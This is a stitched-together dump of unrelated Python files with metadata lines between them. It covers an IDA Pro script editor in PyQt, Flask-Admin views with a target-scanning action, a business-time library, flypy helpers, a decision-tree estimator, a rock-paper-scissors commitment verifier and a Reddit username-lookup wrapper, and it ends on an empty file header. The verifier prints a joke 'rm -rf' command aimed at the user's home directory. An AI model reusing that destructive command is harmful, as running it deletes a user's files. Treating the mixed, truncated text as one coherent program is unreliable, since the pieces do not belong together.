#self.toolBar2.Action21.setShortcut("Ctrl+7") #self.toolBar2.Action21.triggered.connect(self.debugto) #action 6 undo self.toolBar.Action6 = QtWidgets.QAction(QtGui.QIcon(":/ico/undo.png"),"Redo",self.toolBar) self.toolBar.Action6.setStatusTip("Undo.") self.toolBar.Action6.setShortcut("Ctrl+Z") self.toolBar.Action6.triggered.connect(self.codebox.undo) #action 7 redo self.toolBar.Action7 = QtWidgets.QAction(QtGui.QIcon(":/ico/redo.png"),"Redo",self.toolBar) self.toolBar.Action7.setStatusTip("Redo.") self.toolBar.Action7.setShortcut("Ctrl+Y") self.toolBar.Action7.triggered.connect(self.codebox.redo) #action8 rerset Folding self.toolBar.Action8 = QtWidgets.QAction(QtGui.QIcon(":/ico/align-justify.png"),"Reset Folding",self.toolBar) self.toolBar.Action8.setStatusTip("Reset Folding.") self.toolBar.Action8.setShortcut("Ctrl+R") self.toolBar.Action8.triggered.connect(self.nofoldingl) #actions9 CircledTreeFoldStyle self.toolBar.Action9 = QtWidgets.QAction(QtGui.QIcon(":/ico/bullet.png"),"Circled Tree Folding",self.toolBar) self.toolBar.Action9.setStatusTip("Circled Tree Folding.") self.toolBar.Action9.setShortcut("Ctrl+C") self.toolBar.Action9.triggered.connect(self.Circledfold) #actions10 plainFoldStyle self.toolBar.Action10 = QtWidgets.QAction(QtGui.QIcon(":/ico/number.png"),"Plain Folding",self.toolBar) self.toolBar.Action10.setStatusTip("Plain Folding") self.toolBar.Action10.setShortcut("Ctrl+P") self.toolBar.Action10.triggered.connect(self.plainfold) # fonts self.toolBar.Action21 = QtWidgets.QAction(QtGui.QIcon(":/ico4/font.png"), "Fonts", self.toolBar) self.toolBar.Action21.setStatusTip("Fonts") self.toolBar.Action21.setShortcut("Ctrl+F") self.toolBar.Action21.triggered.connect(self.font_choice) #web baby self.toolBar.Action11 = QtWidgets.QAction(QtGui.QIcon(":/ico/web.png"),"Hex-rays Homepage",self.toolBar) self.toolBar.Action11.setStatusTip("Home of Hex-rays") self.toolBar.Action11.setShortcut("Ctrl+W") self.toolBar.Action11.triggered.connect(self.webopen) #irc self.toolBar.Action12 = QtWidgets.QAction(QtGui.QIcon(":/ico3/settings.png"),"Open Ida Pro Python SDK",self.toolBar) self.toolBar.Action12.setStatusTip("Ida Pro Python SDK") self.toolBar.Action12.setShortcut("Ctrl+I") self.toolBar.Action12.triggered.connect(self.sdkopen) #github Python self.toolBar.Action14 = QtWidgets.QAction(QtGui.QIcon(":/ico/github.png"),"Open git python",self.toolBar) self.toolBar.Action14.setStatusTip("Open git python") 
self.toolBar.Action14.setShortcut("Ctrl+G") self.toolBar.Action14.triggered.connect(self.gitopen) #auther me :) self.toolBar.Action15 = QtWidgets.QAction(QtGui.QIcon(":/ico/auth.png"),"Author",self.toolBar) self.toolBar.Action15.setStatusTip("Author") self.toolBar.Action15.setShortcut("Ctrl+B") self.toolBar.Action15.triggered.connect(self.Author) #toggle off code regonision self.toolBar.Action16 = QtWidgets.QAction(QtGui.QIcon(":/ico2/pythonminus.png"),"Disable Code recognition",self.toolBar) self.toolBar.Action16.setStatusTip("Disable Code recognition") self.toolBar.Action16.setShortcut("Alt+D") self.toolBar.Action16.triggered.connect(self.Diablecode) #toogle on self.toolBar.Action17 = QtWidgets.QAction(QtGui.QIcon(":/ico2/pypluss.png"),"Enable Code recognition",self.toolBar) self.toolBar.Action17.setStatusTip("Enable Code recognition") self.toolBar.Action17.setShortcut("Alt+E") self.toolBar.Action17.triggered.connect(self.Reiablecode) # zoom in self.toolBar.Action18 = QtWidgets.QAction(QtGui.QIcon(":/ico3/in.png"),"Zoom In",self.toolBar) self.toolBar.Action18.setStatusTip("Zoom In") self.toolBar.Action18.setShortcut("CTRL+SHIFT++") self.toolBar.Action18.triggered.connect(self.udder) #zoom out self.toolBar.Action19 = QtWidgets.QAction(QtGui.QIcon(":/ico3/out.png"),"Zoom Out",self.toolBar) self.toolBar.Action19.setStatusTip("Zoom Out") self.toolBar.Action19.setShortcut("CTRL+SHIFT+-") self.toolBar.Action19.triggered.connect(self.odder) self.toolBar.Action20 = QtWidgets.QAction(QtGui.QIcon(":/ico3/10.png"),"Profile Code",self.toolBar) self.toolBar.Action20.setStatusTip("Profile Code") self.toolBar.Action20.setShortcut("CTRL+SHIFT+E") self.toolBar.Action20.triggered.connect(self.runtoprob) #PLUGINS HERE WE GO self.toolBar.Action22 = QtWidgets.QAction(QtGui.QIcon(":/ico5/plugin.png"),"Plugin",self.toolBar) self.toolBar.Action22.setStatusTip("Make plugin") self.toolBar.Action22.setShortcut("") self.toolBar.Action22.triggered.connect(self.plugin_make) self.scriptfile = self.codebox.text() self.filename = "" #actions self.toolBar.addAction(self.toolBar.newAction) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.secondAction) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action3) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action4) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action6) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action7) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action8) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action9) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action10) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action21) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action11) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action12) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action14) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action15) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action16) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action17) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action18) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action19) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action20) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action21) self.toolBar.addSeparator() 
self.toolBar.addAction(self.toolBar.Action22) self.skrift = QFont() self.skrift.setFamily('Consolas') self.skrift.setFixedPitch(True) self.skrift.setPointSize(12) self.codebox.setFont(self.skrift) #python style self.lexer = QsciLexerPython(self.codebox) self.lexer.setFont(self.skrift) self.lexer.setEolFill(True) #api test not working api = Qsci.QsciAPIs(self.lexer) API_FILE = dn+'\\Python.api' API_FILE2 = dn+'\\idc.api' API_FILE3 = dn+'\\idaapi.api' api.load(API_FILE) api.load(API_FILE2) api.load(API_FILE3) api.prepare() self.codebox.setAutoCompletionThreshold(0) self.codebox.setAutoCompletionThreshold(6) self.codebox.setAutoCompletionThreshold(8) self.codebox.setAutoCompletionSource(Qsci.QsciScintilla.AcsAPIs) self.lexer.setDefaultFont(self.skrift) self.codebox.setLexer(self.lexer) self.codebox.SendScintilla(QsciScintilla.SCI_STYLESETFONT, 1, 'Consolas') #line numbers fontmetrics = QFontMetrics(self.skrift) self.codebox.setMarginsFont(self.skrift) self.codebox.setMarginWidth(0, fontmetrics.width("00000") + 6) self.codebox.setTabWidth(4) #brace self.codebox.setBraceMatching(QsciScintilla.SloppyBraceMatch) #auto line tab =4 self.codebox.setAutoIndent(True) #scroolbar self.codebox.SendScintilla(QsciScintilla.SCI_SETHSCROLLBAR, 1) self.retranslateUi(MainWindow) QtCore.QMetaObject.connectSlotsByName(MainWindow) def retranslateUi(self, MainWindow): MainWindow.setWindowTitle(_translate("MainWindow", "Ida Pro Python Script Editor", None)) self.toolBar.setWindowTitle(_translate("MainWindow", "toolBar", None)) def plugin_make(self): Wizard.show() def sendgrapped(self): print "hello" helloclass = Ui_Wizard() self.bsout = self.codebox.text() helloclass.script_textEdit.setText(self.bsout) def hubba(self): print "sdfgsdgsgdghsghdg" #print str(self.codebox.text()) def udder(self): self.codebox.zoomIn() def odder(self): self.codebox.zoomOut() def newfile(self): self.codebox.clear() def open(self): self.path = QtCore.QFileInfo(self.filename).path() # Get filename and show only .writer files (self.filename, _) = \ QtWidgets.QFileDialog.getOpenFileName(self.vindu, 'Open File', self.path, 'Python Files (*.py *.pyc *.pyw)', '') if self.filename: with open(self.filename, 'r') as self.file: self.codebox.setText(self.file.read()) os.chdir(str(self.path)) def savefile(self): self.path = QtCore.QFileInfo(self.filename).path() (self.filename, _) = \ QtWidgets.QFileDialog.getSaveFileName(self.vindu, 'Save as' , self.path, 'Python Files (*.py *.pyc *.pyw)') if self.filename: self.savetext(self.filename) os.chdir(str(self.path)) def savetext(self, fileName): textout = self.codebox.text() file = QtCore.QFile(fileName) if file.open(QtCore.QIODevice.WriteOnly): QtCore.QTextStream(file) << textout else: QtWidgets.QMessageBox.information(self.vindu, 'Unable to open file', file.errorString()) os.chdir(str(self.path)) def runto(self): self.path = QtCore.QFileInfo(self.filename).path() g = globals() os.chdir(str(self.path)) script = str(self.codebox.text()) try: os.chdir(str(self.path)) os.path.join(os.path.expanduser('~'), os.path.expandvars(str(self.path))) sys.path.insert(0, str(self.path)) exec (script, g) except Exception as e: print e.__doc__ print e.message else: pass #exec (script, g) def runtoprob(self): try: self.path = QtCore.QFileInfo(self.filename).path() self.path = QtCore.QFileInfo(self.filename).path() g = globals() os.chdir(str(self.path)) script = str(self.codebox.text()) import cProfile cProfile.run(script) except Exception as e: print e.__doc__ print e.message else: import cProfile cProfile.run(script) def 
Diablecode(self): self.codebox.setAutoCompletionSource(Qsci.QsciScintilla.AcsNone) def Reiablecode(self): self.codebox.setAutoCompletionSource(Qsci.QsciScintilla.AcsAPIs) def nofoldingl(self): self.codebox.setFolding(QsciScintilla.NoFoldStyle) def Circledfold(self): self.codebox.setFolding(QsciScintilla.CircledTreeFoldStyle) def plainfold(self): self.codebox.setFolding(QsciScintilla.PlainFoldStyle) def webopen(self): import webbrowser webbrowser.open('https://www.hex-rays.com/') def sdkopen(self): import webbrowser webbrowser.open('https://www.hex-rays.com/products/ida/support/idapython_docs/') def gitopen(self): import webbrowser webbrowser.open('https://github.com/idapython/src/tree/build-1.7.2') def Author(self): import webbrowser webbrowser.open('https://github.com/techbliss') def font_choice(self): self.lbl = self.lexer font, ok = QtWidgets.QFontDialog.getFont() if ok: self.lbl.setFont(font) def on_margin_clicked(self, nmargin, nline, modifiers): # Toggle marker for the line the margin was clicked on if self.codebox.markersAtLine(nline) != 0: self.codebox.markerDelete(nline, self.ARROW_MARKER_NUM) else: self.codebox.markerAdd(nline, self.ARROW_MARKER_NUM) class MyWindow(QtWidgets.QMainWindow): ''' we have to ask user for quiting so we can change back to root dir ''' def closeEvent(self, event): reply = QMessageBox.question(self, 'Exit', "Are you sure to quit?", QMessageBox.Yes | QMessageBox.No, QMessageBox.No) if reply == QMessageBox.Yes: # print dn os.chdir(dn) # print dn #os.chdir('../..') # print dn print ''' ################################################### # Author Storm Shadow # # # # Follow me on twitter # # @zadow28 # ################################################### # Ida pro python Editor # ################################################### ''' event.accept() os.chdir(dn) else: event.ignore() os.chdir(dn) from PyQt5 import Qsci if __name__ == '__main__': import sys Wizard = QtWidgets.QWizard() #Wizard = QtWidgets.QWizard() #app = QtWidgets.QApplication.instance() # enable for usage outside #if not app: # enable for usage outside # app = QtWidgets.QApplication([]) # enable for usage outside MainWindow = MyWindow() ui = Ui_MainWindow() messageformForm = QtWidgets.QWidget() ui2 = Ui_Wizard() ui3 = Ui_messageformForm() ui3.setupUi1(messageformForm) MainWindow.resize(1000, 600) MainWindow.show() # app.exec_()
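# A minimal, self-contained sketch (not part of this file) of the QScintilla
# autocompletion pattern used above: attach a lexer, load .api files into
# QsciAPIs, and switch the editor to API-based completion. The 'Python.api'
# path is a placeholder (like dn + '\\Python.api' above); only documented
# QScintilla calls are used.
from PyQt5.QtWidgets import QApplication
from PyQt5.Qsci import QsciScintilla, QsciLexerPython, QsciAPIs

app = QApplication([])
editor = QsciScintilla()
lexer = QsciLexerPython(editor)
api = QsciAPIs(lexer)
api.load('Python.api')   # placeholder path to an API definition file
api.prepare()            # build the completion database
editor.setLexer(lexer)
editor.setAutoCompletionSource(QsciScintilla.AcsAPIs)
editor.setAutoCompletionThreshold(2)  # pop up after two typed characters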
unlicense
-4,438,855,489,847,117,000
42.621421
338
0.644755
false
3.556545
false
false
false
dorneanu/crudappify
apps/orgapp/app/admin/views.py
1
6660
from flask import Blueprint from flask.ext.sqlalchemy import SQLAlchemy from flask.ext import admin from flask.ext.admin.contrib import sqla from flask.ext.admin import Admin, BaseView, expose from flask.ext.admin.base import MenuLink from flask.ext.admin.babel import gettext, ngettext, lazy_gettext from flask.ext.admin.form import Select2TagsWidget, Select2Field, Select2TagsField, rules from flask.ext.admin.actions import action from wtforms import validators, fields from app import app from app.database import db_session from app.models import AppType, App, AppBundle, Target, Organization, Department, Connection, Header, Tag from app.models import conn_tags_table class AppTypeAdmin(sqla.ModelView): list_template = "list.html" column_display_pk = False form_columns= ['desc'] class AppAdmin(sqla.ModelView): list_template = "list.html" column_display_pk = False # Allow only pre-defined values form_overrides = dict(severity=fields.SelectField) form_args = dict( severity = dict( choices = [('High', 'High'), ('Medium', 'Medium'), ('Low', 'Low')] )) form_columns = [ 'app_name', 'desc', 'app_type', 'bundle', 'version', 'environment', 'platform', 'department', 'contact', 'date_added', 'status', 'last_scan', 'reported_to_dpt', 'open_issues', 'severity', 'tags', 'url', 'comments' ] # Add here list of columns where to search column_searchable_list = ('desc', 'url', 'version', 'environment', 'platform', 'contact', AppBundle.name, Tag.name) # Define here filters column_filters = ('desc', 'app_name', 'department', 'app_type', 'url', 'app_id', 'version', 'environment', 'platform', 'date_added', 'tags', 'severity') # Define which fields should be preloaded by Ajax form_ajax_refs = { 'tags': { 'fields': (Tag.name,) }, 'app_type': { 'fields': (AppType.desc,) }, 'department': { 'fields': (Department.desc,) }, 'bundle': { 'fields': (AppBundle.name, AppBundle.desc,) } } # Group fields form_create_rules = [ rules.FieldSet(('app_name', 'desc', 'app_type', 'bundle', 'url', 'severity', 'tags', 'comments'), 'Application'), rules.FieldSet(('version', 'environment', 'platform', 'status'), 'Technical details'), rules.FieldSet(('contact', 'department'), 'Contact'), rules.FieldSet(('open_issues', 'last_scan', 'reported_to_dpt'), 'Audit details'), ] # Use same rule set for editing pages form_edit_rules = form_create_rules def __init__(self, session): # Just call parent class with predefined model super(AppAdmin, self).__init__(App, session) class AppBundleAdmin(sqla.ModelView): list_template = "list.html" class TargetAdmin(sqla.ModelView): list_template = "list.html" column_display_pk = False # Allow only pre-defined values form_overrides = dict(priority=fields.SelectField) form_args = dict( priority = dict( choices = [('High', 'High'), ('Medium', 'Medium'), ('Low', 'Low')] )) column_filters = ('scheme', 'user', 'password', 'netloc', 'port', 'path', 'params', 'query', 'fragment', 'priority', 'comments') column_searchable_list = ('scheme', 'user', 'password', 'netloc', 'path', 'params', 'query', 'fragment', 'priority', 'comments', Tag.name) form_ajax_refs = { 'tags': { 'fields': (Tag.name,) } } # Group fields form_create_rules = [ rules.FieldSet(('scheme', 'user', 'password', 'netloc', 'port', 'path', 'query', 'fragment'), 'URL Info'), rules.FieldSet(('priority', 'tags', 'comments', 'connection'), 'Audit details') ] # Use same rule set for editing pages form_edit_rules = form_create_rules @expose("/export") def action_export(self): return '<p>Not implemented yet</p>' @action('scan', 'Scan') def action_scan(self, ids): 
import json from utils.connection import send_request t = [] data = [] for id in ids: headers = [] target = db_session.query(Target).filter_by(id=id).one() t.append(target.to_string()) # Connect to target response = send_request(target.to_string(), t) # Collect headers for r in response.headers: headers.append({'header': r, 'value': response.headers[r]}) data.append({'id': id, 'data': headers}) return json.dumps(data, indent=2) def __init__(self, session): super(TargetAdmin, self).__init__(Target, session) class OrgAdmin(sqla.ModelView): # list_template = "list.html" column_display_pk = True class DepartmentAdmin(sqla.ModelView): list_template = "list.html" column_display_pk = False form_columns = ['org', 'desc', 'contact'] column_searchable_list = ('desc', Organization.desc) column_filters = ('desc', 'org') form_args = dict( text=dict(label='Big Text', validators=[validators.required()]) ) form_ajax_refs = { 'org': { 'fields': (Organization.desc,) } } def __init__(self, session): # Just call parent class with predefined model super(DepartmentAdmin, self).__init__(Department, session) class ConnectionAdmin(sqla.ModelView): list_template = "list.html" column_display_pk = False form_columns = ['conn_type', 'url', 'port', 'answer', 'redirect', 'tags'] column_searchable_list = ('conn_type', 'url', 'answer', 'redirect', 'ip', Tag.name) column_filters = ('conn_type', 'url', 'port', 'answer', 'redirect', 'ip', Tag.name) # Define which fields should be preloaded by Ajax form_ajax_refs = { 'tags': { 'fields': (Tag.name,) } } class HeaderAdmin(sqla.ModelView): list_template = "list.html" form_columns = ['conn_id', 'header', 'value'] # Add admin functionality admin = Admin(app, name="Admin App Survey", url="/admin", base_template="layout-admin.html", template_mode="bootstrap3") # Add models views admin.add_view(AppTypeAdmin(AppType, db_session)) admin.add_view(sqla.ModelView(Tag, db_session)) admin.add_view(AppAdmin(db_session)) admin.add_view(AppBundleAdmin(AppBundle, db_session)) admin.add_view(ConnectionAdmin(Connection, db_session)) admin.add_view(HeaderAdmin(Header, db_session)) admin.add_view(OrgAdmin(Organization, db_session)) admin.add_view(DepartmentAdmin(db_session)) admin.add_view(TargetAdmin(db_session))
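# A minimal sketch (not part of this module), following the Flask-Admin
# @action contract used by TargetAdmin.action_scan above: the decorated
# method receives the list of selected primary keys. "DemoView" and the
# confirmation text are illustrative placeholders.
from flask.ext.admin.actions import action
from flask.ext.admin.contrib import sqla

class DemoView(sqla.ModelView):
    @action('export', 'Export', 'Export the selected rows?')
    def action_export_selected(self, ids):
        # ids holds the primary keys of the rows the user ticked
        return ', '.join(str(i) for i in ids)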
mit
-3,902,489,461,993,599,500
31.487805
156
0.618018
false
3.661352
false
false
false
seppemans/businesstimedelta
businesstimedelta/businesstimedelta.py
1
2641
import datetime import pytz def localize_unlocalized_dt(dt): """Turn naive datetime objects into UTC. Don't do anything if the datetime object is aware. https://docs.python.org/3/library/datetime.html#datetime.timezone """ if dt.tzinfo is not None and dt.tzinfo.utcoffset(dt) is not None: return dt return pytz.utc.localize(dt) class BusinessTimeDelta(object): def __init__(self, rule, hours=0, seconds=0, timedelta=None): self.rule = rule if timedelta: self.timedelta = timedelta else: self.timedelta = datetime.timedelta( seconds=seconds, hours=hours) def __repr__(self): return '<BusinessTimeDelta %s hours %s seconds>' % (self.hours, self.seconds) def __eq__(self, other): return self.timedelta == other.timedelta def __add__(self, other): if isinstance(other, BusinessTimeDelta) and other.rule == self.rule: return BusinessTimeDelta(self.rule, timedelta=self.timedelta + other.timedelta) elif isinstance(other, datetime.datetime): dt = localize_unlocalized_dt(other) td_left = self.timedelta while True: period_start, period_end = self.rule.next(dt) period_delta = period_end - period_start # If we ran out of timedelta, return if period_delta >= td_left: return period_start + td_left td_left -= period_delta dt = period_end raise NotImplementedError def __radd__(self, other): return self.__add__(other) def __sub__(self, other): if isinstance(other, BusinessTimeDelta) and other.rule == self.rule: return BusinessTimeDelta(self.rule, timedelta=self.timedelta - other.timedelta) elif isinstance(other, datetime.datetime): dt = localize_unlocalized_dt(other) td_left = self.timedelta while True: period_start, period_end = self.rule.previous(dt) period_delta = period_end - period_start # If we ran out of timedelta, return if period_delta >= td_left: return period_end - td_left td_left -= period_delta dt = period_start def __rsub__(self, other): return self.__sub__(other) @property def hours(self): return int(self.timedelta.total_seconds() // (60 * 60)) @property def seconds(self): return int(self.timedelta.total_seconds() % (60 * 60))
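# A minimal, self-contained sketch (not part of this module) of how
# BusinessTimeDelta consumes rule periods. AlwaysOpenRule is a hypothetical
# stand-in for the package's real rule classes: next()/previous() must yield
# (start, end) business periods around a datetime.
import datetime
import pytz

class AlwaysOpenRule(object):
    """Every hour counts as business time, served in 24-hour periods."""

    def next(self, dt):
        return dt, dt + datetime.timedelta(hours=24)

    def previous(self, dt):
        return dt - datetime.timedelta(hours=24), dt

rule = AlwaysOpenRule()
start = pytz.utc.localize(datetime.datetime(2020, 1, 1, 9, 0))
print(BusinessTimeDelta(rule, hours=30) + start)
# -> 2020-01-02 15:00:00+00:00 (30 business hours consumed across two periods)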
mit
6,038,156,290,826,573,000
31.207317
91
0.581598
false
4.294309
false
false
false
flypy/flypy
flypy/runtime/lowlevel_impls.py
1
1431
# -*- coding: utf-8 -*- """ Low-level implementations of opaque methods. """ from __future__ import print_function, division, absolute_import import string from flypy.compiler import opaque from pykit import ir, types as ptypes def add_impl(opaque_func, name, implementation, restype=None, restype_func=None): """ Assign an implementation to an `opaque` function. Sets up a pykit function and calls `implementation` to produce the function body. """ def impl(py_func, argtypes): # TODO: do this better from flypy.compiler import representation_type ll_argtypes = [representation_type(x) for x in argtypes] argnames = list(string.ascii_letters[:len(argtypes)]) # Determine return type if restype_func: result_type = restype_func(argtypes) else: result_type = restype or ll_argtypes[0] type = ptypes.Function(result_type, tuple(ll_argtypes), False) func = ir.Function(name, argnames, type) func.new_block("entry") b = ir.Builder(func) b.position_at_beginning(func.startblock) implementation(b, argtypes, *func.args) return func opaque.implement_opaque(opaque_func, impl) def add_impl_cls(cls, name, implementation, restype=None, restype_func=None): opaque_func = getattr(cls, name) add_impl(opaque_func, name, implementation, restype, restype_func)
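# A hedged sketch (not part of this module): the `implementation` callback
# passed to add_impl receives the pykit builder, the flypy argument types,
# and the IR-level arguments, and emits the function body. The builder's
# `ret` method is an assumption about the pykit API, not verified usage.
def impl_identity(b, argtypes, x):
    # Emit "return x" for a one-argument opaque function.
    b.ret(x)

# Hypothetical wiring, assuming `identity` is an @opaque-decorated function:
# add_impl(identity, "identity", impl_identity)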
bsd-2-clause
8,591,202,777,185,511,000
29.446809
81
0.665968
false
3.795756
false
false
false
dmitru/pines
pines/estimators.py
1
4069
# coding=utf-8 import numpy as np from sklearn.base import BaseEstimator, ClassifierMixin, RegressorMixin from sklearn.utils import check_X_y, check_array from sklearn.utils.validation import NotFittedError from pines.tree_builders import TreeType, ProblemType class DecisionTreeClassifier(BaseEstimator, ClassifierMixin): def __init__(self, tree_type=TreeType.CART, **kwargs): """ Builds a decision tree for a classification problem. Args: tree_type (string): One of 'cart' or 'oblivious', default is 'cart' **kwargs: arguments to pass to a `TreeBuilder` instance Returns: self """ super(DecisionTreeClassifier, self).__init__() self.tree_ = None self.tree_type = tree_type self._tree_builder_kwargs = kwargs self._tree_builder_class = TreeType.get_tree_builder(tree_type) def fit(self, X, y, **kwargs): X, y = check_X_y(X, y, dtype=np.float64) data_size, n_features = X.shape self._n_features = n_features self._tree_builder = self._tree_builder_class( problem=ProblemType.CLASSIFICATION, **self._tree_builder_kwargs ) self.tree_ = self._tree_builder.build_tree(X, y) return self def predict(self, X, check_input=True): if check_input: X = self._validate_X_predict(X, check_input=True) return self.tree_.predict(X) def _validate_X_predict(self, X, check_input): """Validate X whenever one tries to predict, apply, predict_proba""" if self.tree_ is None: raise NotFittedError("Estimator not fitted, " "call `fit` before exploiting the model.") if check_input: X = check_array(X, dtype='f') n_features = X.shape[1] if self._n_features != n_features: raise ValueError("Number of features of the model must " " match the input. Model n_features is %s and " " input n_features is %s " % (self._n_features, n_features)) return X class DecisionTreeRegressor(BaseEstimator, RegressorMixin): def __init__(self, tree_type=TreeType.CART, **kwargs): """ Builds a decision tree for a classification problem. Args: tree_type (string): One of 'cart' or 'oblivious', default is 'cart' **kwargs: arguments to pass to a `TreeBuilder` instance Returns: self """ super(DecisionTreeRegressor, self).__init__() self._tree = None self.tree_type = tree_type self._tree_builder_kwargs = kwargs self._tree_builder_class = TreeType.get_tree_builder(tree_type) def fit(self, X, y, **kwargs): X, y = check_X_y(X, y, dtype=np.float64) data_size, n_features = X.shape self._n_features = n_features self._tree_builder = self._tree_builder_class( problem=ProblemType.REGRESSION, **self._tree_builder_kwargs ) self._tree = self._tree_builder.build_tree(X, y) return self def predict(self, X, check_input=True): if check_input: X = self._validate_X_predict(X, check_input=True) return self._tree.predict(X) def _validate_X_predict(self, X, check_input): """Validate X whenever one tries to predict, apply, predict_proba""" if self._tree is None: raise NotFittedError("Estimator not fitted, " "call `fit` before exploiting the model.") if check_input: X = check_array(X, dtype='f') n_features = X.shape[1] if self._n_features != n_features: raise ValueError("Number of features of the model must " " match the input. Model n_features is %s and " " input n_features is %s " % (self._n_features, n_features)) return X
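# A minimal smoke-test sketch (not part of this module). The estimators
# follow the scikit-learn fit/predict contract, so toy usage looks like any
# sklearn model; the data below is made up.
import numpy as np

X = np.array([[0.0, 0.0], [0.0, 1.0], [1.0, 0.0], [1.0, 1.0]])
y = np.array([0, 0, 1, 1])

clf = DecisionTreeClassifier(tree_type=TreeType.CART)
clf.fit(X, y)
print(clf.predict(X))  # expected to reproduce y on this separable toy set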
mit
-3,523,422,632,452,845,000
35.00885
79
0.576554
false
3.958171
false
false
false
yeukhon/homework
computer-security/commitment/verifier.py
1
1699
#!/usr/bin/env python

import sys
import os
from Crypto import Random
from Crypto.Random import random as R
import cPickle as pcl
import hashlib as H

# # # paper-rock-scissors over a line # # #
#
# 1. wait for init message
# 2. wait for commitment to one of the values
# 3. send random choice in {paper,rock,scissors}
# 4. wait for decommit value
# 5. report results.
#
# # # # # # # # # # # # # # # # # # # # # #

items = {"paper": 0, "rock": 1, "scissors": 2}

initMessage = pcl.load(sys.stdin)
if initMessage != "hello":
    sys.stderr.write("You're supposed to say hello.\n")
    sys.exit()

# say hello back.
pcl.dump(initMessage, sys.stdout)
sys.stdout.flush()

# now wait for the committed value
commitment = pcl.load(sys.stdin)

# at this point it is safe to just report our value,
# since we already have theirs.
rnd = R.StrongRandom()
item = list(items)[rnd.randint(0, len(items) - 1)]
pcl.dump(item, sys.stdout)
sys.stdout.flush()

# now read the decommit value
decommit = pcl.load(sys.stdin)

# this will be a list with the randomness first,
# and the committed value second.
theiritem = decommit[1]

# make sure they aren't trying to cheat, and finally
# report the results.
h = H.sha512()
h.update(decommit[0])
h.update(decommit[1])
if h.hexdigest() != commitment:
    message = "Cheater! You'll pay for that...\nrm -rf " \
        + os.environ['HOME'] + "\nj/k hahahaha\n"
elif items[item] == items[theiritem]:
    message = "I guess it's a draw.\n"
elif (items[item] + 1) % 3 == items[theiritem]:
    message = "You lose. Hahahahaha\n"
else:
    message = "You win.\n"

pcl.dump(message, sys.stdout)
sys.stderr.write(message)
sys.stdout.flush()
sys.exit()
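# A sketch of the committer's side implied by the check above (not part of
# this script): pick randomness r, send H(r || item) first, and reveal
# [r, item] only after seeing the verifier's choice. The 16-byte randomness
# length is an assumption; the verifier simply recomputes the hash over both parts.
import hashlib as H
from Crypto import Random

r = Random.new().read(16)
item = "rock"
h = H.sha512()
h.update(r)
h.update(item)
commitment = h.hexdigest()  # sent before the verifier reveals its choice
decommit = [r, item]        # sent afterwards for verification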
mpl-2.0
-892,549,920,783,651,600
25.546875
67
0.664509
false
2.865093
false
false
false
i3visio/osrframework
osrframework/wrappers/reddit.py
1
3889
################################################################################ # # Copyright 2015-2020 Félix Brezo and Yaiza Rubio # # This program is part of OSRFramework. You can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ################################################################################ __author__ = "Felix Brezo, Yaiza Rubio <contacto@i3visio.com>" __version__ = "2.0" from osrframework.utils.platforms import Platform class Reddit(Platform): """A <Platform> object for Reddit""" def __init__(self): self.platformName = "Reddit" self.tags = ["forum"] ######################## # Defining valid modes # ######################## self.isValidMode = {} self.isValidMode["phonefy"] = False self.isValidMode["usufy"] = True self.isValidMode["searchfy"] = False ###################################### # Search URL for the different modes # ###################################### # Strings with the URL for each and every mode self.url = {} #self.url["phonefy"] = "http://anyurl.com//phone/" + "<phonefy>" self.url["usufy"] = "http://en.reddit.com/user/" + "<usufy>" #self.url["searchfy"] = "http://anyurl.com/search/" + "<searchfy>" ###################################### # Whether the user needs credentials # ###################################### self.needsCredentials = {} #self.needsCredentials["phonefy"] = False self.needsCredentials["usufy"] = False #self.needsCredentials["searchfy"] = False ################# # Valid queries # ################# # Strings that will imply that the query number is not appearing self.validQuery = {} # The regular expression '.+' will match any query #self.validQuery["phonefy"] = ".*" self.validQuery["usufy"] = ".+" #self.validQuery["searchfy"] = ".*" ################### # Not_found clues # ################### # Strings that will imply that the query number is not appearing self.notFoundText = {} #self.notFoundText["phonefy"] = [] self.notFoundText["usufy"] = ["<title>reddit.com: page not found</title>"] #self.notFoundText["searchfy"] = [] ######################### # Fields to be searched # ######################### self.fieldsRegExp = {} # Definition of regular expressions to be searched in phonefy mode #self.fieldsRegExp["phonefy"] = {} # Example of fields: #self.fieldsRegExp["phonefy"]["i3visio.location"] = "" # Definition of regular expressions to be searched in usufy mode self.fieldsRegExp["usufy"] = {} # Example of fields: #self.fieldsRegExp["usufy"]["i3visio.location"] = "" # Definition of regular expressions to be searched in searchfy mode #self.fieldsRegExp["searchfy"] = {} # Example of fields: #self.fieldsRegExp["searchfy"]["i3visio.location"] = "" ################ # Fields found # ################ # This attribute will be feeded when running the program. self.foundFields = {}
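# A minimal sketch (not part of this module), assuming the framework's
# convention of substituting the <usufy> placeholder with the queried nick
# (the substitution call itself is an illustration, not osrframework code):
platform = Reddit()
nick = "example_user"
print(platform.url["usufy"].replace("<usufy>", nick))
# -> http://en.reddit.com/user/example_user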
agpl-3.0
4,466,890,473,808,879,000
37.88
82
0.523405
false
4.358744
false
false
false
influence-usa/python-opencivicdata-django
opencivicdata/models/base.py
1
3359
